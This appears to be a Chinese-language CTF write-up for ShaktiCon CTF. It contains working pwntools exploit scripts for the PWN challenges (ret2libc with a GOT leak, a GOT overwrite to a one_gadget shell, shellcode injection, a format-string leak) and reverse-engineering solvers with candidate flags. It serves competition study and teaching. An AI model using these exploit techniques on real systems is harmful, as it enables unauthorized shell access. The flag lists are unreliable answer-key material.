Shakticon-CTF

(Updated: )
Competitions
, ,

# shakticon-ctf-WP

# 总览


rank 8/596
solved 20/28
很水的国外比赛,只有前三名全是女生的队伍才有奖金,最高 512,最低100,最低100
感觉适合拿来招新赛。
PWN 方向题目,过于简单,以至于太 friendly,不到半小时 ak 了
reverse 那里最难的那一道题思路 100% 正确,但是写出来的脚本是半自动的,手动的时候估计又小错误然后 flag 中间就有一点错误导致 500pts 没了,这题只有 4 人解出。
感觉在 re 方面还是有学习价值的,PWN 方面就算了,全是水题。接着就看看 pearlctf 了。那里还有个 2.35 的 UAF

# PWN

# binary_heist

这题简单 ret2libc,但是靶机的 libc 和给的 libc 不符合,和牛马 qsnctf 一个样子。但是这个我们能拿到 got 表地址,直接查 libc 就行了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
#patchelf --set-interpreter /home/akyuu/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/ld-2.23.so --replace-needed libc.so.6 /home/akyuu/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc.so.6 pwn
from pwn import*
from Crypto.Util.number import long_to_bytes,bytes_to_long

context.log_level='debug'
context(arch='amd64',os='linux')
context.terminal=['tmux','splitw','-h']

pwn = './vuln'
p=remote('65.0.128.220',30314)
# p=process(['./ld-linux-x86-64.so.2', pwn], env={"LD_PRELOAD":'./libc.so.6'})
# p=process('')

elf=ELF(pwn)
libc=ELF('./libc.so.6')
p.recvuntil("System: Enter your name for log: ")

pop_rdi_rsi=0x401207
vuln=0x4012c2
payload=b'a'*0x18+p64(pop_rdi_rsi)+p64(elf.got['puts'])+b'a'*8+p64(elf.plt['puts'])+p64(0x40101a)+p64(vuln)

p.sendline(payload)
p.recvuntil("passcodes.\n")
# p.recv()
# p.recv()

addr=u64(p.recv(6)+b'\x00\x00')
print(hex(addr))
base=addr-	0x080e50
print(hex(base))
p.recvuntil("System: Enter your name for log: ")
payload=b'a'*0x18+p64(0x401207)+p64(base+0x1d8678)+p64(0)+p64(base+	0x050d70)
# 0x000000000002be51 : pop rsi ; ret
# 0x000000000011f497 : pop rdx ; pop r12 ; ret
# 000000000002a3e5 : pop rdi ; ret
# gdb.attach(p)
p.sendline(payload)
p.interactive()

# 0x00000000001d8698 : /bin/sh
# Gadgets information
# ============================================================
# 0x000000000040119d : pop rbp ; ret
# 0x0000000000401207 : pop rdi ; pop rsi ; ret
# 0x0000000000401208 : pop rsi ; ret
# 0x000000000040101a : ret
# 0x00000000004012ba : ret 0xfffd

# 0xebcf1 execve("/bin/sh", r10, [rbp-0x70])
# constraints:
#   address rbp-0x78 is writable
#   [r10] == NULL || r10 == NULL || r10 is a valid argv
#   [[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp

# 0xebcf5 execve("/bin/sh", r10, rdx)
# constraints:
#   address rbp-0x78 is writable
#   [r10] == NULL || r10 == NULL || r10 is a valid argv
#   [rdx] == NULL || rdx == NULL || rdx is a valid envp

# 0xebcf8 execve("/bin/sh", rsi, rdx)
# constraints:
#   address rbp-0x78 is writable
#   [rsi] == NULL || rsi == NULL || rsi is a valid argv
#   [rdx] == NULL || rdx == NULL || rdx is a valid envp

# 0xebd52 execve("/bin/sh", rbp-0x50, r12)
# constraints:
#   address rbp-0x48 is writable
#   r13 == NULL || {"/bin/sh", r13, NULL} is a valid argv
#   [r12] == NULL || r12 == NULL || r12 is a valid envp

# 0xebda8 execve("/bin/sh", rbp-0x50, [rbp-0x70])
# constraints:
#   address rbp-0x48 is writable
#   r12 == NULL || {"/bin/sh", r12, NULL} is a valid argv
#   [[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp

# 0xebdaf execve("/bin/sh", rbp-0x50, [rbp-0x70])
# constraints:
#   address rbp-0x48 is writable
#   rax == NULL || {rax, r12, NULL} is a valid argv
#   [[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp

# 0xebdb3 execve("/bin/sh", rbp-0x50, [rbp-0x70])
# constraints:
#   address rbp-0x50 is writable
#   rax == NULL || {rax, [rbp-0x48], NULL} is a valid argv
#   [[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp

# sim

直接改 got 表了,很水

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
#patchelf --set-interpreter /home/akyuu/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/ld-2.23.so --replace-needed libc.so.6 /home/akyuu/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc.so.6 pwn
from pwn import*
from Crypto.Util.number import long_to_bytes,bytes_to_long

context.log_level='debug'
context(arch='amd64',os='linux')
context.terminal=['tmux','splitw','-h']

pwn = './sim'
p=remote('13.234.11.113',32317)
# p=process(['./ld-2.27.so', pwn], env={"LD_PRELOAD":'./libc-2.27.so'})
# p=process('')
main=0x0804879D
#elf=ELF(pwn)
#libc=ELF('./libc.so.6')
p.sendlineafter("ARMOUR: enabled! Try to break in ;)",b"ccf%15$p")
p.sendlineafter("3. break armour","3")
p.recvuntil("0x")
addr=int(p.recv(8),16)
base=addr-(0xf7daff21-0xf7d97000)
sys_a=base+0x03CE10
fini=0x08049F0C
puts_got=0x804A01C
add=0x804A080
exit_got=0x0804A020
one=0x3ccf0+base
idx=exit_got-add
idx//=16
p.sendlineafter("3. break armour","1")
p.sendlineafter("Enter the index :",str(idx))

p.sendlineafter("Enter the data :",p32(one))
print("one: ",hex(one))
# p.sendlineafter("3. break armour","1")
# p.sendlineafter("Enter the index :",str(idx))
# p.sendlineafter("Enter the data :",p32(sys_a))
# 

# p.sendlineafter("3. break armour","3")
# p.sendlineafter("3. break armour","3")
# gdb.attach(p)
p.interactive()


# 0x3ccea execve("/bin/sh", esp+0x34, environ)
# constraints:
#   esi is the GOT address of libc
#   [esp+0x34] == NULL

# 0x3ccec execve("/bin/sh", esp+0x38, environ)
# constraints:
#   esi is the GOT address of libc
#   [esp+0x38] == NULL

# 0x3ccf0 execve("/bin/sh", esp+0x3c, environ)
# constraints:
#   esi is the GOT address of libc
#   [esp+0x3c] == NULL

# 0x3ccf7 execve("/bin/sh", esp+0x40, environ)
# constraints:
#   esi is the GOT address of libc
#   [esp+0x40] == NULL

# 0x6739f execl("/bin/sh", eax)
# constraints:
#   esi is the GOT address of libc
#   eax == NULL

# 0x673a0 execl("/bin/sh", [esp])
# constraints:
#   esi is the GOT address of libc
#   [esp] == NULL

# 0x13563e execl("/bin/sh", eax)
# constraints:
#   ebx is the GOT address of libc
#   eax == NULL

# 0x13563f execl("/bin/sh", [esp])
# constraints:
#   ebx is the GOT address of libc
#   [esp] == NULL

# chall

真就 “焯!”

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#patchelf --set-interpreter /home/akyuu/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/ld-2.23.so --replace-needed libc.so.6 /home/akyuu/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc.so.6 pwn
from pwn import*
from Crypto.Util.number import long_to_bytes,bytes_to_long

context.log_level='debug'
context(arch='amd64',os='linux')
context.terminal=['tmux','splitw','-h']

pwn = './chall'
p=remote('13.234.11.113',30187)
#p=process(['./ld-2.31.so', pwn], env={"LD_PRELOAD":'./libc-2.31.so'})
# p=process('./chall')
# gdb.attach(p)
#elf=ELF(pwn)
#libc=ELF('./libc.so.6')
p.sendline(asm(shellcraft.sh()))
p.interactive()

# 忘了叫什么了

就是读入了 flag,还是在栈上,然后读入 s,printf (s)

直接写 % s 不知道为什么打印不出来 flag
整的我又用 % p 然后 hex 转的 str

1
2
3
4
5
6
7
8
arr=[0x746369746b616873,0x3472676e30637b66,0x5f796234625f3574,0x333737346d723066,0xa7d72]
from Crypto.Util.number import long_to_bytes,bytes_to_long
fla=b''
for i in arr:
    b=long_to_bytes(i)
    for j in range(len(b)-1,-1,-1):
        fla+=long_to_bytes(b[j])
print(fla)

# reverse

# 忘记名字 1

逆向之后就是解个 n 元一次方程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
v17+v27-v29==106
v21+v43-v40==174
v45+v13-v28==111
v25+v29-v39==19
v34+v20-v13==16
v12+v32-v38==75
v37+v16-v17==111
v31+v24-v44==83
v38+v19-v37==113
v13+v31-v16==89
v28+v37-v46==141
v16+v17-v26==115
v40+v25-v42==18
v36+v41-v14==155
v32+v11-v30==84
v18+v33-v24==31
v26+v22-v35==187
v14+v38-v18==102
v24+v15-v43==51
v39+v28-v25==141
v30+v21-v11==102
v33+v46-v31==40
v35+v12-v23==22
v22+v39-v19==109
v29+v34-v36==95
v45+v11+v18==184
v23+v36-v12==60
v19+v30-v32==96
v41+v44-v21==73
v41+v46+v14==135
v27+v40-v20==130
v33+v20+v26==179
v42+v45-v15==87
v15+v23-v27==83
v44+v42-v34==64
v16+v15+v14+v13+v12+v11==458
v22+v21+v20+v19+v18+v17==425
v28+v27+v26+v25+v24+v23==445
v34+v33+v32+v31+v30+v29==526
v40+v39+v38+v37+v36+v35==418
v46+v45+v44+v43+v42+v41==522
v41+v35+v29+v23+v17+v11==394
v42+v36+v30+v24+v18+v12==382
v43+v37+v31+v25+v19+v13==560
v44+v38+v32+v26+v20+v14==357
v45+v39+v33+v27+v21+v15==599
v46+v40+v34+v28+v22+v16==502

垃圾 gpt 写的代码不能用,直接自己写了一个生成的代码。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#include<bits/stdc++.h>

using namespace std;

int main(){
    freopen("fcs","r",stdin);
    freopen("fcs.py","w",stdout);
    cout<<"from z3 import *\n";
    for(int i=11;i<=46;i++){
        cout<<"v"<<i<<"=Real('"<<"v"<<i<<"')\n";
    }
    cout<<"solver = Solver()\n";
    string s;
    while(cin>>s){
        cout<<"solver.add("<<s<<")\n";
    }
    cout<<"if solver.check() == sat:\n    model = solver.model()\n";
    cout<<"print(model)\n";
    // for(int i=11;i<=46;i++){
    //     cout<<"    print(\"v"<<i<<"=\""<<", model["<<i-11<<"])\n";
    // }
    return 0;
}

生成的 py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
from z3 import *
v11=Real('v11')
v12=Real('v12')
v13=Real('v13')
v14=Real('v14')
v15=Real('v15')
v16=Real('v16')
v17=Real('v17')
v18=Real('v18')
v19=Real('v19')
v20=Real('v20')
v21=Real('v21')
v22=Real('v22')
v23=Real('v23')
v24=Real('v24')
v25=Real('v25')
v26=Real('v26')
v27=Real('v27')
v28=Real('v28')
v29=Real('v29')
v30=Real('v30')
v31=Real('v31')
v32=Real('v32')
v33=Real('v33')
v34=Real('v34')
v35=Real('v35')
v36=Real('v36')
v37=Real('v37')
v38=Real('v38')
v39=Real('v39')
v40=Real('v40')
v41=Real('v41')
v42=Real('v42')
v43=Real('v43')
v44=Real('v44')
v45=Real('v45')
v46=Real('v46')
solver = Solver()
solver.add(v17+v27-v29==106)
solver.add(v21+v43-v40==174)
solver.add(v45+v13-v28==111)
solver.add(v25+v29-v39==19)
solver.add(v34+v20-v13==16)
solver.add(v12+v32-v38==75)
solver.add(v37+v16-v17==111)
solver.add(v31+v24-v44==83)
solver.add(v38+v19-v37==113)
solver.add(v13+v31-v16==89)
solver.add(v28+v37-v46==141)
solver.add(v16+v17-v26==115)
solver.add(v40+v25-v42==18)
solver.add(v36+v41-v14==155)
solver.add(v32+v11-v30==84)
solver.add(v18+v33-v24==31)
solver.add(v26+v22-v35==187)
solver.add(v14+v38-v18==102)
solver.add(v24+v15-v43==51)
solver.add(v39+v28-v25==141)
solver.add(v30+v21-v11==102)
solver.add(v33+v46-v31==40)
solver.add(v35+v12-v23==22)
solver.add(v22+v39-v19==109)
solver.add(v29+v34-v36==95)
solver.add(v45+v11+v18==184)
solver.add(v23+v36-v12==60)
solver.add(v19+v30-v32==96)
solver.add(v41+v44-v21==73)
solver.add(v41+v46+v14==135)
solver.add(v27+v40-v20==130)
solver.add(v33+v20+v26==179)
solver.add(v42+v45-v15==87)
solver.add(v15+v23-v27==83)
solver.add(v44+v42-v34==64)
solver.add(v16+v15+v14+v13+v12+v11==458)
solver.add(v22+v21+v20+v19+v18+v17==425)
solver.add(v28+v27+v26+v25+v24+v23==445)
solver.add(v34+v33+v32+v31+v30+v29==526)
solver.add(v40+v39+v38+v37+v36+v35==418)
solver.add(v46+v45+v44+v43+v42+v41==522)
solver.add(v41+v35+v29+v23+v17+v11==394)
solver.add(v42+v36+v30+v24+v18+v12==382)
solver.add(v43+v37+v31+v25+v19+v13==560)
solver.add(v44+v38+v32+v26+v20+v14==357)
solver.add(v45+v39+v33+v27+v21+v15==599)
solver.add(v46+v40+v34+v28+v22+v16==502)
if solver.check() == sat:
    model = solver.model()
print(model)

得出结果按照变量手动排序,逆向得出程序把变量进行了交换,偶数下标异或了一下,直接逆。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
#include <bits/stdc++.h>

using namespace std;
char a[] = {71, 89, 90, 6, 99, 103, 86, 2, 109, 6,102, 120, 74, 70, 47, 74, 90, 90, 70, 71, 102, 84, 99, 100, 7, 75, 94, 98, 98, 46, 86, 75, 118, 89, 111, 43};
char arr[1000],Str[1000];
int main()
{
    for (int mm = 5; mm >=0; --mm)
    {
        int v54 = *(&a[2] + 6 * mm);
        *(&a[2] + 6 * mm) = *(&a[3] + 6 * mm);
        *(&a[3] + 6 * mm) = v54;
    }
    for (int kk = 5; kk>=0; --kk)
    {
        int v52 = *(&a[6] + kk);
        *(&a[6] + kk) = *(&a[30] + kk);
        *(&a[30] + kk) = v52;
    }
    for (int jj = 5; jj >=0; --jj)
    {
        int v50 = *(&a[0] + 6 * jj + 1);
        *(&a[0] + 6 * jj + 1) = *(&a[4] + 6 * jj);
        *(&a[4] + 6 * jj) = v50;
    }
    for (int ii = 5; ii >=0; --ii)
    {
        int v48 = *(&a[0] + ii);
        *(&a[0] + ii) = *(&a[18] + ii);
        *(&a[18] + ii) = v48;
    }
    for (int i=0;i<36;i++)cout<<char(a[i]+5);
    cout<<endl;
    int v44 = 0;
    for (int m = 0; m < 6; ++m)
    {
        for (int n = 0; n < 6; ++n)
            arr[v44++]=*(&a[0] + 6 * m + n);
    }
    for (int k = 0; k < 36; ++k)
        arr[k] += 5;
    
    int v4 = 36;
    for (int j = 0; j < 36; ++j)
    {
        if (j % 2)
            Str[j]=arr[j];
        else
            Str[j] = arr[j] ^ 0x38;
    }
    for (int i=0;i<36;i++)cout<<Str[i];
    return 0;
}

# 忘记名字 2

简单 reverse,随便一下就出来了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#include <bits/stdc++.h>

using namespace std;
string a1="}!d33dn1_3gn3ll4hc_pUmr4w_4_51_s1ht{ftcitkahs";
int result,v2;
int main()
{
    int v3 = 0;
    for (int i = a1.length() - 1;; --i)
    {
        result = v3;
        if (v3 >= i)
            break;
        v2 = a1[v3];
        a1[v3] = a1[i];
        a1[i] = v2;
        ++v3;
    }
    cout<<a1;
    return 0;
}

# 忘记名字 3

最难的一个,具体程序不陈述了。思路就是每五位爆破,但是合法结果多,直接 check 函数过滤一下,得到了将近 200 个 flag,但是中间有小错误导致结果错误。
很可惜。
错了一堆半自动化的脚本。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
#include <bits/stdc++.h>

using namespace std;

int cases[] = {0x14, 0x17, 0x1a, 0x1d, 0x20, 0x23, 0x26, 0x29, 0x2c, 0x2f};
int cac[5];
int process(int v1, int arr)
{
    int result, a3 = 10; // rax

    switch (arr)
    {
    case 0x14:
        result = v1;
        break;
    case 0x17:
        result = (8 * v1);
        break;
    case 0x1A:
        result = (3 * a3 + v1);
        break;
    case 0x1D:
        if (v1 <= 1000)
            result = (a3 * a3 * v1);
        else
            result = v1;
        break;
    case 0x20:
        result = a3 ^ v1;
        break;
    case 0x23:
        if (v1 <= 1000000)
            goto LABEL_11;
        result = (v1 / 1000);
        break;
    case 0x26:
    LABEL_11:
        if (v1 <= a3)
            result = v1;
        else
            result = (v1 - a3);
        break;
    case 0x29:
        if (v1 <= 10000)
            result = (a3 * v1);
        else
            result = v1;
        break;
    case 0x2C:
        result = (2 * v1);
        break;
    case 0x2F:
        result = (v1 + a3);
        break;
    default:
        result = 0LL;
        break;
    }
    return result;
}

int v12[52], v13[52], v13_1[52], v13_2[52], v13_3[52], v13_4[52], v13_5[52];

int main()
{
    memset(v13, 0, 0xC8uLL);

    for (int i1 = 0; i1 < 10; i1++)
    {
        int a1 = cases[i1];
        for (int j = 0; j < 50; j++)
        {
            v13_1[j] = process(v13[j], a1);
        }
        for (int i2 = 0; i2 < 10; i2++)
        {
            int a2 = cases[i2];
            for (int j = 0; j < 50; j++)
            {
                v13_2[j] = process(v13_1[j], a2);
            }
            for (int i3 = 0; i3 < 10; i3++)
            {
                int a3 = cases[i3];
                for (int j = 0; j < 50; j++)
                {
                    v13_3[j] = process(v13_2[j], a3);
                }
                for (int i4 = 0; i4 < 10; i4++)
                {
                    int a4 = cases[i4];
                    for (int j = 0; j < 50; j++)
                    {
                        v13_4[j] = process(v13_3[j], a4);
                    }
                    for (int i5 = 0; i5 < 10; i5++)
                    {
                        int a5 = cases[i5];
                        for (int j = 0; j < 50; j++)
                        {
                            v13_5[j] = process(v13_4[j], a5);
                        }


                        // cout<<a1<<" "<<a2<<" "<<a3<<" "<<a4<<" "<<a5<<endl;
                        int xor1 = a1 ^ a2 ^ a3 ^ a4 ^ a5;
                        if (xor1 == 42 && a1 == 38 && a5 == 26)
                            cout << a1 << " , " << a2 << " , " << a3 << " , " << a4 << " , " << a5 << endl;
                    }
                }
            }
        }
    }
    return 0;
}

// shaktictf{3f9ctr6n7csaM0m3t1m3s_1s_p81b_735294758}
// shaktictf{3f9ctr0n1csaM0m3t1m3s_1s_p81b_735294758}
// shaktictf{3f3ctr6n7csaM0m3t1m3s_1s_p81b_735294758}
// shaktictf{3f3ctr0n1csaM0m3t1m3s_1s_p81b_735294758}
// shaktictf{3j3etr6n7csaM0m3t1m3s_1s_p81b_735294758}
// shaktictf{3j3etr0n1csaM0m3t1m3s_1s_p81b_735294758}
// shaktictf{3j9otr6n7csaM0m3t1m3s_1s_p81b_735294758}
// shaktictf{3j9otr0n1csaM0m3t1m3s_1s_p81b_735294758}
// shaktictf{3f9ctr6n7cs_s0m3t1m3s_1s_p81b_735294758}
// shaktictf{3f9ctr0n1cs_s0m3t1m3s_1s_p81b_735294758}
// shaktictf{3f3ctr6n7cs_s0m3t1m3s_1s_p81b_735294758}
// shaktictf{3f3ctr0n1cs_s0m3t1m3s_1s_p81b_735294758}
// shaktictf{3j3etr6n7cs_s0m3t1m3s_1s_p81b_735294758}
// shaktictf{3j3etr0n1cs_s0m3t1m3s_1s_p81b_735294758}
// shaktictf{3j9otr6n7cs_s0m3t1m3s_1s_p81b_735294758}
// shaktictf{3j9otr0n1cs_s0m3t1m3s_1s_p81b_735294758}
// shaktictf{3f9ctr6n7csaM0m3t1m3s_1s_p41n_735294758}
// shaktictf{3f9ctr0n1csaM0m3t1m3s_1s_p41n_735294758}
// shaktictf{3f3ctr6n7csaM0m3t1m3s_1s_p41n_735294758}
// shaktictf{3f3ctr0n1csaM0m3t1m3s_1s_p41n_735294758}
// shaktictf{3j3etr6n7csaM0m3t1m3s_1s_p41n_735294758}
// shaktictf{3j3etr0n1csaM0m3t1m3s_1s_p41n_735294758}
// shaktictf{3j9otr6n7csaM0m3t1m3s_1s_p41n_735294758}
// shaktictf{3j9otr0n1csaM0m3t1m3s_1s_p41n_735294758}
// shaktictf{3f9ctr6n7cs_s0m3t1m3s_1s_p41n_735294758}
// shaktictf{3f9ctr0n1cs_s0m3t1m3s_1s_p41n_735294758}
// shaktictf{3f3ctr6n7cs_s0m3t1m3s_1s_p41n_735294758}
// shaktictf{3f3ctr0n1cs_s0m3t1m3s_1s_p41n_735294758}
// shaktictf{3j3etr6n7cs_s0m3t1m3s_1s_p41n_735294758}
// shaktictf{3j3etr0n1cs_s0m3t1m3s_1s_p41n_735294758}
// shaktictf{3j9otr6n7cs_s0m3t1m3s_1s_p41n_735294758}
// shaktictf{3j9otr0n1cs_s0m3t1m3s_1s_p41n_735294758}
// shaktictf{3f9ctr6n7csaM0m3t1m3s_1s_p44k_735294758}
// shaktictf{3f9ctr0n1csaM0m3t1m3s_1s_p44k_735294758}
// shaktictf{3f3ctr6n7csaM0m3t1m3s_1s_p44k_735294758}
// shaktictf{3f3ctr0n1csaM0m3t1m3s_1s_p44k_735294758}
// shaktictf{3j3etr6n7csaM0m3t1m3s_1s_p44k_735294758}
// shaktictf{3j3etr0n1csaM0m3t1m3s_1s_p44k_735294758}
// shaktictf{3j9otr6n7csaM0m3t1m3s_1s_p44k_735294758}
// shaktictf{3j9otr0n1csaM0m3t1m3s_1s_p44k_735294758}
// shaktictf{3f9ctr6n7cs_s0m3t1m3s_1s_p44k_735294758}
// shaktictf{3f9ctr0n1cs_s0m3t1m3s_1s_p44k_735294758}
// shaktictf{3f3ctr6n7cs_s0m3t1m3s_1s_p44k_735294758}
// shaktictf{3f3ctr0n1cs_s0m3t1m3s_1s_p44k_735294758}
// shaktictf{3j3etr6n7cs_s0m3t1m3s_1s_p44k_735294758}
// shaktictf{3j3etr0n1cs_s0m3t1m3s_1s_p44k_735294758}
// shaktictf{3j9otr6n7cs_s0m3t1m3s_1s_p44k_735294758}
// shaktictf{3j9otr0n1cs_s0m3t1m3s_1s_p44k_735294758}

// shaktictf{3f9ctr6n7csaM0m3t1m3s_1s_p81b_736194758}
// shaktictf{3f9ctr0n1csaM0m3t1m3s_1s_p81b_736194758}
// shaktictf{3f3ctr6n7csaM0m3t1m3s_1s_p81b_736194758}
// shaktictf{3f3ctr0n1csaM0m3t1m3s_1s_p81b_736194758}
// shaktictf{3j3etr6n7csaM0m3t1m3s_1s_p81b_736194758}
// shaktictf{3j3etr0n1csaM0m3t1m3s_1s_p81b_736194758}
// shaktictf{3j9otr6n7csaM0m3t1m3s_1s_p81b_736194758}
// shaktictf{3j9otr0n1csaM0m3t1m3s_1s_p81b_736194758}
// shaktictf{3f9ctr6n7cs_s0m3t1m3s_1s_p81b_736194758}
// shaktictf{3f9ctr0n1cs_s0m3t1m3s_1s_p81b_736194758}
// shaktictf{3f3ctr6n7cs_s0m3t1m3s_1s_p81b_736194758}
// shaktictf{3f3ctr0n1cs_s0m3t1m3s_1s_p81b_736194758}
// shaktictf{3j3etr6n7cs_s0m3t1m3s_1s_p81b_736194758}
// shaktictf{3j3etr0n1cs_s0m3t1m3s_1s_p81b_736194758}
// shaktictf{3j9otr6n7cs_s0m3t1m3s_1s_p81b_736194758}
// shaktictf{3j9otr0n1cs_s0m3t1m3s_1s_p81b_736194758}
// shaktictf{3f9ctr6n7csaM0m3t1m3s_1s_p41n_736194758}
// shaktictf{3f9ctr0n1csaM0m3t1m3s_1s_p41n_736194758}
// shaktictf{3f3ctr6n7csaM0m3t1m3s_1s_p41n_736194758}
// shaktictf{3f3ctr0n1csaM0m3t1m3s_1s_p41n_736194758}
// shaktictf{3j3etr6n7csaM0m3t1m3s_1s_p41n_736194758}
// shaktictf{3j3etr0n1csaM0m3t1m3s_1s_p41n_736194758}
// shaktictf{3j9otr6n7csaM0m3t1m3s_1s_p41n_736194758}
// shaktictf{3j9otr0n1csaM0m3t1m3s_1s_p41n_736194758}
// shaktictf{3f9ctr6n7cs_s0m3t1m3s_1s_p41n_736194758}
// shaktictf{3f9ctr0n1cs_s0m3t1m3s_1s_p41n_736194758}
// shaktictf{3f3ctr6n7cs_s0m3t1m3s_1s_p41n_736194758}
// shaktictf{3f3ctr0n1cs_s0m3t1m3s_1s_p41n_736194758}
// shaktictf{3j3etr6n7cs_s0m3t1m3s_1s_p41n_736194758}
// shaktictf{3j3etr0n1cs_s0m3t1m3s_1s_p41n_736194758}
// shaktictf{3j9otr6n7cs_s0m3t1m3s_1s_p41n_736194758}
// shaktictf{3j9otr0n1cs_s0m3t1m3s_1s_p41n_736194758}
// shaktictf{3f9ctr6n7csaM0m3t1m3s_1s_p44k_736194758}
// shaktictf{3f9ctr0n1csaM0m3t1m3s_1s_p44k_736194758}
// shaktictf{3f3ctr6n7csaM0m3t1m3s_1s_p44k_736194758}
// shaktictf{3f3ctr0n1csaM0m3t1m3s_1s_p44k_736194758}
// shaktictf{3j3etr6n7csaM0m3t1m3s_1s_p44k_736194758}
// shaktictf{3j3etr0n1csaM0m3t1m3s_1s_p44k_736194758}
// shaktictf{3j9otr6n7csaM0m3t1m3s_1s_p44k_736194758}
// shaktictf{3j9otr0n1csaM0m3t1m3s_1s_p44k_736194758}
// shaktictf{3f9ctr6n7cs_s0m3t1m3s_1s_p44k_736194758}
// shaktictf{3f9ctr0n1cs_s0m3t1m3s_1s_p44k_736194758}
// shaktictf{3f3ctr6n7cs_s0m3t1m3s_1s_p44k_736194758}
// shaktictf{3f3ctr0n1cs_s0m3t1m3s_1s_p44k_736194758}
// shaktictf{3j3etr6n7cs_s0m3t1m3s_1s_p44k_736194758}
// shaktictf{3j3etr0n1cs_s0m3t1m3s_1s_p44k_736194758}
// shaktictf{3j9otr6n7cs_s0m3t1m3s_1s_p44k_736194758}
// shaktictf{3j9otr0n1cs_s0m3t1m3s_1s_p44k_736194758}


// 32 , 44 , 44 , 35 , 47

// 32 , 47 , 23 , 29 , 26
// 32 , 47 , 29 , 23 , 26

// 23 , 35 , 41 , 47 , 47 3f9ct
// 
// 23 , 41 , 35 , 47 , 47 3f3ct
// 
// 23 , 47 , 35 , 41 , 47 3j3et
// 23 , 47 , 41 , 35 , 47 3j9ot

// 
// 
// 41 , 41 , 20 , 47 , 47 r6n7c
// 
// 41 , 47 , 20 , 41 , 47 r0n1c
// 

// 35 , 29 , 35 , 41 , 41 saM0m
// 
// 35 , 35 , 29 , 41 , 41 s_s0m
// 
// 
// 

// 26 , 32 , 26 , 23 , 29 3t1m3

// 26 , 35 , 35 , 41 , 44 s_1s_

// 29 , 20 , 29 , 38 , 29
// 29 , 20 , 38 , 29 , 29
// 29 , 29 , 20 , 38 , 29
// 29 , 29 , 38 , 20 , 29
// 29 , 35 , 35 , 47 , 29 p81b_
// 29 , 35 , 47 , 35 , 29
// 29 , 38 , 20 , 29 , 29
// 29 , 38 , 29 , 20 , 29
// 29 , 38 , 38 , 47 , 29
// 29 , 38 , 47 , 38 , 29
// 29 , 47 , 35 , 35 , 29 p41n_
// 29 , 47 , 38 , 38 , 29 p44k_

// 26 , 20 , 38 , 23 , 20
// 26 , 38 , 20 , 23 , 20 73529
// 26 , 38 , 23 , 20 , 20 73619

// 38 , 32 , 44 , 26 , 26 4758}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
#include <bits/stdc++.h>

using namespace std;
int v12[50];
int main()
{
    v12[0] = 83;
    v12[1] = 68;
    v12[2] = 77;
    v12[3] = 72;
    v12[4] = 91;
    v12[5] = 73;
    v12[6] = 76;
    v12[7] = 99;
    v12[8] = 123;
    v12[9] = 97;
    v12[10] = 36;
    v12[11] = 69;
    v12[12] = 16;
    v12[13] = 76;
    v12[14] = 91;
    v12[15] = 91;
    v12[16] = 31;
    v12[17] = 122;
    v12[18] = 24;
    v12[19] = 76;
    v12[20] = 80;
    v12[21] = 124;
    v12[22] = 110;
    v12[23] = 25;
    v12[24] = 68;
    v12[25] = 41;
    v12[26] = 84;
    v12[27] = 43;
    v12[28] = 122;
    v12[29] = 46;
    v12[30] = 105;
